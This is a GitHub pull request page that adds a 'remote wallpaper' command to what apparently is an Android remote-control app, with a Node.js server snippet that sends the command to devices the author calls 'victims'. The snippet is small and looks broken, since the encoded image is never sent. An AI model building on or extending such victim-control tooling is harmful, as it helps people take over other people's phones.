Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Update AppActions.kt #69

Open
wants to merge 1 commit into
base: main
Choose a base branch
from
Open

Update AppActions.kt #69

wants to merge 1 commit into from

Conversation

Botsailer
Copy link

added the functionality of remote wallpaper set just add this server code to server accordingly:

var data = fs.readFileSync('lol.webp') //replace with actual file path and image name
const base64Data = data.toString('base64');
const text = {
commands: "wallpaper", //keep it wallpaper as apk will just respond to command "wallpaper" if you want to change victims wallpaper
data: "none",
};
ws.send(JSON.stringify(text))

added the functionality of remote wallpaper set
@Botsailer
Copy link
Author

add this server code accordingly

var data = fs.readFileSync('lol.webp') //replace with actual file path and image name
const base64Data = data.toString('base64');
const text = {
commands: "wallpaper", //keep it wallpaper as apk will just respond to command "wallpaper" if you want to change victims wallpaper
data: "none",
};
ws.send(JSON.stringify(text))

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

None yet

1 participant